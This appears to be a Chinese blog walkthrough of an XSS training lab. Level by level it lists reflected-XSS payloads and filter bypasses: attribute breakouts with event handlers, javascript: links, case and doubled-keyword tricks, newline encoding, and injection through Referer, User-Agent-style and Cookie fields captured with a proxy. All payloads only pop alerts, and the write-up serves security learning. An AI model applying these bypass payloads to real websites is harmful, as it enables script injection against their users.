第一关
首先进入页面咱们直接来试试反射型 <script>alert(1)</script>直接就成功了然后开启第二关
第二关
进来后看见搜索框不知道它的闭合是什么样的咱们直接右击查看页面源代码去看看
输入"><script>alert(1)</script>直接通过
第三关
这里输入语句发现错误来到页面源代码查看发现< >被转义过滤了
这里回去改一下语句' οnclick=alert(1)//
第四关
跟第三关差不多我们看一下页面代码就知晓了" οnclick=alert(1)//是双引号闭合
第五关
这里还是去看页面源代码分析 进行尝试"><script>alert(1)</script>
发现不对然后换<a>成功
"><a href=javascript:alert(1)>11</a>//
第六关
这里还是进行尝试看页面源代码
然后判断它的输出方式
"><scriPt>alert(1)</script>
第七关
这里也是用<a>标签尝试"><a hrhrefef=javascrscriptipt:alert(1)>sxy</a>//成功
第八关
这一关添加链接差不多算是留言的那种
所以尝试javascript:alert(1)
第九关
这里也是添加链接尝试上一关的可是不行查看源代码
找到问题修改语句:javascript:alert(1)//http://
第十关
这里还是进入源代码查看
&t_sort=" type='text' οnclick=javascript:alert(12)>//
输入后发现弹出一个框点一下成功过关
第十一关
这里抓包发现没有referer
referer:&t_sort=" type='text' οnclick=javascript:alert(12)>//
那咱们就手动添加然后放包
然后回去点击输入框提示成功
第十二关
这里找不到那个输入点
咱们抓包进去看
在这里添加咱们的语句 " οnfοcus=javascript:alert() type="text
然后放包会来点击成功
第十三关
这里抓包进来尝试Cookie传参写完语句就放包
回来有个框框点一下提示完成
第十四关
这里等了半天也没啥东西直接跳到第十五关
第十五关
在图片位置给个点击事件 οnclick='alert(1)'写完点击图片就提示成功
第十六关
这里试了好多标签不行查看源代码它给空格过滤了 这里用url编码绕过?keyword=<svg%0Aοnlοad=alert(1)>
第十七关
这里上构造语句写一个移动事件当鼠标移动到插件上的时候就出弹窗了
/level17.php?arg01=a&arg02=b οnmοuseοver=javascript:alert(1)
第十八关
这里跟上一关一样
/level18.php?arg01=a&arg02=b οnmοuseοver=alert(1)
第十九关-第二十关
因为我没有flash插件所以做不了这里就不做了
扫一扫
1120
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
